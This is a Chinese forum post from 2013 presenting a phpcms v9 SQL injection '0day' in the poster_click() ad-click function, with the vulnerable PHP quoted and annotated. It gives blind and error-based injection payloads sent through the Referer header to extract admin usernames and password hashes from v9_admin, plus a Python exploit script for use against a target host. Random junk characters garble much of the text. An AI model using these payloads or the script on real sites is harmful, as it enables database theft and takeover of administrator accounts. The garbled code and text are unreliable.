
标题: phpcms post_click注入0day利用代码

作者: admin    时间: 2013-1-11 21:01
标题: phpcms post_click注入0day利用代码
有人放出了phpcmsv9的0day,就随手写了个利用代码,其中注入代码有两种形式:
9 J4 Z- r; Y5 Z
问题函数: \phpcms\modules\poster\index.php

// poster_click(): phpcms v9 advertisement click tracker, quoted from the post
// (\phpcms\modules\poster\index.php). The enclosing class is not shown here.
// Review notes below are written from the defender's side: where untrusted
// request data reaches a sink, and what the fix would have to do.
) c. b( d. Z5 jpublic function poster_click() {* O9 m$ q: L9 q7 U) Q/ H3 U# W6 }
// The id is cast with intval(), so this parameter itself is not the issue.
$id = isset($_GET['id']) ? intval($_GET['id']) : 0;
7 H2 I% s5 H' k5 g6 \$r = $this->db->get_one(array('id'=>$id));8 j! o8 H/ I% X( w* b
if (!is_array($r) && empty($r)) return false;
% A8 V( F9 Y) a# J4 T( J$ T$ip_area = pc_base::load_sys_class('ip_area');
8 g5 t2 I9 S% |/ J" j6 v6 v" y$ip = ip();
2 Q8 M$ k4 O: S4 x2 H. f5 H6 L$area = $ip_area->get($ip);8 C+ \9 k2 X& o1 U0 P" I) n
// Cookie-derived value; whether param::get_cookie() sanitises it is not
// visible in this excerpt, so treat it as attacker-influenced as well.
$username = param::get_cookie('username') ? param::get_cookie('username') : '';
2 P. w  e2 S2 I& K1 O8 W) q& fif($id) {
! N. o5 J) S, n' T5 F- V7 ?! q$siteid = isset($_GET['siteid']) ? intval($_GET['siteid']) : get_siteid();  [2 p% I! j; [. }$ W2 H0 F
// Sink the post is about: the HTTP_REFERER constant (presumably the request's
// Referer header) is passed straight to insert() as the 'referer' column with
// no escaping visible here; whether insert() quotes values internally is not
// shown, the post's claim is that it does not. Fix: escape/parameterize every
// request-derived value before it reaches SQL (username, area, referer) and
// cap the stored referer length. Detection: the injected text sits verbatim
// in the Referer header of the click request.
$this->s_db->insert(array('siteid'=>$siteid, 'pid'=>$id, 'username'=>$username, 'area'=>$area, 'ip'=>$ip, 'referer'=>HTTP_REFERER, 'clicktime'=>SYS_TIME, 'type'=> 1));
$ [# z7 ^& w4 v! Q6 c( q4 H7 o- @5 t}
' s  O8 R5 c3 r# @" ]$ K$this->db->update(array('clicks'=>'+=1'), array('id'=>$id));9 o' H. U+ |- }
$setting = string2array($r['setting']);
! C8 h" T) r& kif (count($setting)==1) {8 l3 E+ a& z: ]: O- Q
$url = $setting['1']['linkurl'];
2 f2 h% E% x$ i$ a( _& _} else {  C3 {+ b2 s# F$ G
// NOTE(review): when the poster has more than one setting entry, $_GET['url']
// is accepted unvalidated and emitted in a Location header below — an
// open-redirect risk independent of the injection. Validate it against the
// configured linkurl values (or an allowlist) before redirecting.
$url = isset($_GET['url']) ? $_GET['url'] : $setting['1']['linkurl'];
5 X* D" H1 |" D4 W+ E9 C}& }$ ^. G) O' `' F
header('Location: '.$url);3 @& E* l3 `0 I; w% m0 v
}
9 |" h0 [9 w6 M1 `$ V
( A$ |- v" f+ O* U7 ` 9 V, r% R; I9 v
- O: e' ^" S4 x7 a5 \0 G
利用方式:
3 Q. a7 v) R! V) m, E- p9 A3 \5 `! \; W0 E
1、可以采用盲注入的手法:
3 S3 R/ b& C8 |8 S- C; v4 u" H, x; n" E
referer:1′,(select password from v9_admin where userid=1 substr(password,4)=’xxoo’),’1′)#" m$ c% B9 ]8 s) r" i) m% J

$ l8 Q5 u3 e: s通过返回页面,正常与否一个个猜解密码字段。: K7 ?; n" r3 n( U5 C
, E4 D' u0 e1 Z" m5 O1 x: E
2、代码是花开写的,随手附上了:
$ I1 r4 o0 d, a/ d' n: S( m
1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#
3 l4 d/ C# m& x8 N( c0 }6 v4 E1 v
此方法是爆错注入手法,原理自查。3 Q7 w! O+ k/ p  S; Y
# M# Z/ p9 m* ?0 |! G+ ]
) k9 r* d% N: k* V/ L
6 c. {4 k3 m' p2 {, [+ c
利用程序:
" u+ F4 i1 Q* l7 b) q9 J! V4 h; y' j$ S" E! o+ J6 U5 i2 S
#!/usr/bin/env python
& _+ V+ Q" K& }5 v% T; limport httplib,sys,re
+ o; x. N3 L7 Q
. B4 O& J4 e" e$ I$ Z: bdef attack():
# Proof-of-concept request sender for the poster_click() issue quoted above.
# Python 2 code (print statements, httplib); as pasted here the typographic
# quotes and lost indentation mean it would not parse as-is.
# Reads the target host (argv[1]) and site base path (argv[2]).
# Defender's reading of what this leaves behind:
#   - the SQL text travels verbatim in the Referer request header, which is
#     the value poster_click() hands to insert() as the 'referer' column;
#   - the only success signal is a MySQL "Duplicate entry ..." string in the
#     response body, i.e. raw database errors are being returned to clients.
# Mitigation belongs in the PHP (escape/parameterize the referer, suppress
# verbose SQL errors); a request-header rule matching SQL keywords in Referer
# would detect this exactly as sent.
( G; I# j0 ?3 m- u  A4 M- K' L) Qprint “Code by Pax.Mac Team conqu3r!”
& L% w4 r' u# w" Lprint “Welcome to our zone!!!”
( w5 q- |+ o$ G  ~9 Kurl=sys.argv[1]  Q& |6 ]6 t% `* t' _) H& p
paths=sys.argv[2]
3 ]- Q1 N  ^. v' H: s! Gconn = httplib.HTTPConnection(url)
# Static headers; the Referer carries the payload, the User-Agent is a fixed
# 2009-era Firefox string (a second, weaker log signature).
% l1 f/ T6 p1 Q, A3 |# j& V9 `9 _$ _7 ii_headers = {“User-Agent”: “Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5″,
* H5 s2 [/ X' @1 S, y6 O“Accept”: “text/plain”,
8 w- o9 B3 B4 F, d“Referer”: “1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#”}
# Single GET to the poster module's click action; the module/controller/action
# triple in the query string is the request-side indicator to look for.
  P# H8 N  ?( {9 Vconn.request(“GET”, paths+”/index.php?m=poster&c=index&a=poster_click&sitespaceid=1&id=2″, headers = i_headers)
6 s; G5 f# K7 U4 {2 U$ w  I! F% lr1 = conn.getresponse()5 l- U( O5 s/ Q# _" `! }; V% }7 e# o$ I
datas=r1.read()- W. H" _' x" g0 ?( R
# Success is inferred solely from the database error text echoed in the page.
datas=re.findall(r”Duplicate entry \’\w+’”, datas)
  q, b8 o/ y" k% o/ O, k, Gprint datas[0]: |! v, h; x# _' D
conn.close()) P- `7 B' d  X& m3 A- U3 ~" d; K" L
# Script entry point: requires two positional arguments (host, base path) and
# prints a usage banner otherwise. The banner text, including the "Usgae"
# typo and the example hostnames, is the author's own and is left as quoted.
if __name__==”__main__”:/ a' J* I6 J; c6 R$ B/ `- m
if len(sys.argv)<3:
* ?# o0 B2 g! [# Y9 vprint “Code by Pax.Mac Team conqu3r”  c" H( N; J& Q- a7 T; }
print “Usgae:”
6 m, P  W0 W% o: y; h5 @# n1 {* _print “    phpcmsattack.py   www.paxmac.org /”
# F9 a5 F3 p# G# [% U- q( ^print “    phpcmsataack.py   www.paxmac.org /phpcmsv9/”3 k' f" H: u! v2 A
sys.exit(1)
/ O$ j* u" v( F9 u4 Pattack()3 A" h4 A! b3 \1 c; `

2 I+ L9 K5 Y/ u: ~6 ~



